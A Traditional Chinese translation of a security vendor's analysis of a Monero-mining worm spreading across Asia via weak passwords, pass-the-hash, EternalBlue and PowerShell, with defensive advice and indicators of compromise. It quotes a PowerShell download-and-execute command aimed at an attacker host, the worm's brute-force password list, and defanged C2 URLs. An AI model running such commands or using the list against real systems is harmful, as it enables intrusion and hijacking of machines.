趨勢科技偵測到一個惡意軟體: Trojan.PS1.LUDICROUZ.A用多種感染方式,擴散門羅幣挖礦程式到更多的系統和伺服器。該挖礦病毒在今年初現身中國,原先的感染方式是用弱密碼及pass-the-hash(傳遞雜湊)技術,還有經由Windows管理工具與公開原始碼進行暴力破解攻擊, 。在日本發現的這起新案例會用EternalBlue(永恆之藍) 漏洞攻擊及PowerShell來入侵系統並躲避偵測。
看起來攻擊者正在將此殭屍網路擴展到其他國家;趨勢科技發現在台灣、日本、香港、越南、印度及澳洲都發現了此威脅。
趨勢科技發現這個惡意軟體非常複雜,專門設計成感染更多的電腦,而且可以不會馬上被偵測到。它會利用電腦系統和資料庫的弱密碼,針對企業可能仍在使用的老舊軟體,使用會在記憶體內下載和執行組件的PowerShell腳本,攻擊未修補的漏洞以及使用Windows的啟動資料夾和任務排程進行安裝。
鑑於PowerShell的日漸普及加上有越來越多公開可用的開放程式碼,可以預期會看到更加複雜的惡意軟體。雖然收集系統資訊並送回C&C與直接竊取個人身份資料相比可能顯得微不足道,但系統資訊對機器來說是獨一無二的,可以用來追蹤識別使用者及其活動。
呼籲企業儘早更新系統, 使用複雜密碼, 並應用可以從閘道到端點主動封鎖這些威脅和惡意網址的多層次保護系統。
主要散播方式是利用弱密碼登入連接網路的其他電腦
這個惡意軟體(趨勢科技偵測為Trojan.PS1.LUDICROUZ.A)的主要散播方式是利用弱密碼登入連接網路的其他電腦。它不會直接將自己複製到連接的系統,而是透過遠端命令來變更中毒電腦的防火牆和端口轉發設定,建立排程來下載並執行更新的惡意軟體。下載的PowerShell腳本會執行:
IEX (New-Object Net.WebClient).downloadstring(‘hxxp://v.beahh[.]com/wm?hp’)
123456 password PASSWORD football welcome 1 12 21 123 321 1234 12345 123123 123321 111111 654321 666666 121212 000000 222222 888888 | 1111 555555 1234567 12345678 123456789 987654321 admin abc123 abcd1234 abcd@1234 abc@123 p@ssword P@ssword p@ssw0rd P@ssw0rd P@SSWORD P@SSW0RD P@$$w0rd P@$$word P@$$w0rd iloveyou | monkey login passw0rd master hello qazwsx password1 qwerty baseball qwertyuiop superman 1qaz2wsx fuckyou 123qwe zxcvbn pass aaaaaa love administrator |
表1 主要散播用的弱密碼。
它還會將此列表與Invoke-WMIMethod(趨勢科技偵測為HackTool.Win32.Impacket.AI)一起使用,來取得對其他電腦的遠端存取能力:
圖1. Invoke-WMIMethod用來遠端存取使用弱密碼的電腦。
惡意軟體還會用pass-the-hash的方式,利用使用者的密碼雜湊來取得遠端伺服器認證。惡意軟體利用Get-PassHashes命令來取得儲存在電腦內的雜湊值,再加上了所列出弱密碼的雜湊值。有了這些雜湊值後,惡意軟體利用Invoke-SMBClient(另一個公開腳本)透過pass-the-hash進行檔案共享操作。
圖2. 惡意軟體利用pass-the-hash技術取得使用者密碼雜湊值及弱密碼雜湊值。
成功之後,它會刪除檔案%Start Menu%\Programs\Startup\run.bat,這可能是舊版本的惡意軟體。它還會刪除以下內容:
- %Application Data%\flashplayer.tmp
- %Application Data%\sign.txt – 用來表示電腦已被感染
- %Start Menu%\Programs\Startup\FlashPlayer.lnk – 負責在啟動時執行腳本tmp
利用EternalBlue漏洞及濫用PowerShell,攻擊非弱密碼用戶
如果用戶使用較強的密碼,則惡意軟體會用EternalBlue(永恆之藍) 進行散播。
圖3. 漏洞攻擊的惡意負荷。
當電腦被任一方式感染後,惡意軟體會取得MAC地址並收集電腦內安裝防毒產品的資訊。它會從C&C伺服器下載另一個混淆過的PowerShell腳本(趨勢科技偵測為Trojan.PS1.PCASTLE.B),分析顯示下載網址會將之前所取得資訊送回給攻擊者。下載的PowerShell是負責下載及執行惡意軟體的組件,大多是自身的副本。
圖4. 惡意軟體用來取得MAC地址和防毒產品的行為。
要檢查惡意軟體是否已安裝其組件,它會尋找下列檔案:
- %Temp%\kkk1.log
- %Temp%\pp2.log
- %Temp%\333.log
- %Temp%\kk4.log
- %Temp%\kk5.log
圖5. 檢查已安裝的惡意軟體組件。
每個$flagX代表一個組件,惡意軟體會下載一個較新版本的PowerShell腳本($flag)並建立排程來定期執行(如果尚未設定的話)。惡意軟體的行為取決於它運行的權限。$flag2還會從不同網址下載惡意軟體副本,並建立不同名稱的排程任務。
圖6. 排程任務的$flag和$flag2。
收集系統資訊
第三個組件(趨勢科技偵測為TrojanSpy.Win32.BEAHNY.THCACAI)是會收集系統資訊的木馬程式(包成較大的檔案,可能是為了躲避沙箱偵測):
- 電腦名稱
- 機器的GUID
- MAC地址
- 作業系統版本
- 顯卡記憶體資訊
- 系統時間
第四個組件是Python編譯的二進制執行檔,用來進一步地散播惡意軟體。它也能夠透過使用Mimikatz的PowerShell(趨勢科技偵測為Trojan.PS1.MIMIKATZ.ADW)來進行pass-the-hash攻擊。
圖7. 植入第四個組件。
圖8. 檢查Mimikatz組件是否安裝,並執行Mimikatz。
惡意軟體還會嘗試用弱SQL密碼來連到有漏洞的資料庫伺服器,並在連線時執行shell命令xp_cmdshell。與主檔案一樣,該組件利用跟過去漏洞攻擊有關的公開程式碼來掃描IP區塊找出可以用EternalBlue攻擊的有漏洞系統。
圖9. 掃描找出有漏洞的資料庫伺服器。
第五個組件是需要下載執行的可執行檔。但下載網址在本文撰寫時還是離線狀態。
惡意軟體所用的門羅幣採礦程式也是透過PowerShell部署,但並不儲存在檔案裡。而是用另一個公開程式碼Invoke-ReflectivePEInjection來注入自己的PowerShell程序。安裝後,惡意軟體會將其狀態回報給C&C伺服器。
圖10. 下載並執行挖礦程式的PowerShell腳本。
圖11. 執行挖礦程式。
圖12. 惡意軟體的新網址。
儘早更新系統, 使用複雜密碼, 從閘道到端點多層次保護系統
趨勢科技建議要儘早使用廠商提供的修補程式來更新系統。使用老舊軟體的用戶也可以透過可靠的虛擬修補技術來保護自己。直到本文撰寫時,惡意軟體仍在活動中且已經更新,並且會連到新網址。使用複雜密碼,並且儘可能地分層認證授權。同時建議企業要應用可以從閘道到端點主動封鎖這些威脅和惡意網址的多層次保護系統。
入侵指標
SHA256 | 偵測名稱 |
3f28cace99d826b3fa6ed3030ff14ba77295d47a4b6785a190b7d8bc0f337e41 | Trojan.PS1.MIMIKATZ.ADW |
7c402add8feffadc6f07881d201cb21bc4b39df98709917949533f6febd53b6e | Trojan.PS1.LUDICROUZ.A |
aaef385a090d83639fb924c679b2ff22e90ae9377774674d537670a975513397 | TrojanSpy.Win32.BEAHNY.THCACAI |
e28b7c8b4fc37b0ef91f32bd856dd71599acd2f2071fcba4984cc331827c0e13 | Trojan.PS1.PCASTLE.B |
fa0978b3d14458524bb235d6095358a27af9f2e9281be7cd0eb1a4d2123a8330 | HackTool.Win32.Impacket.AI |
網址
- hxxp://down[.]beahh[.]com/c32.dat
- hxxp://down[.]beahh[.]com/new.dat?allv5
- hxxp://ii[.]ackng[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}
- hxxp://log[.]beahh[.]com/logging.php?ver=5p?src=wm&target
- hxxp://oo[.]beahh[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}
- hxxp://p[.]beahh[.]com/upgrade.php
- hxxp://pp[.]abbny[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}
- hxxp://v[.]beahh[.]com/wm?hp
- hxxp://v[.]y6h[.]net/g?h
- hxxp://v[.]y6h[.]net/g?l
- lplp1[.]abbny[.]com:443
- lplp1[.]ackng[.]com:443
- lplp1[.]beahh[.]com:443
@原文出處:Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse 作者:Augusto Remillano II和Arvin Macaraeg(趨勢科技)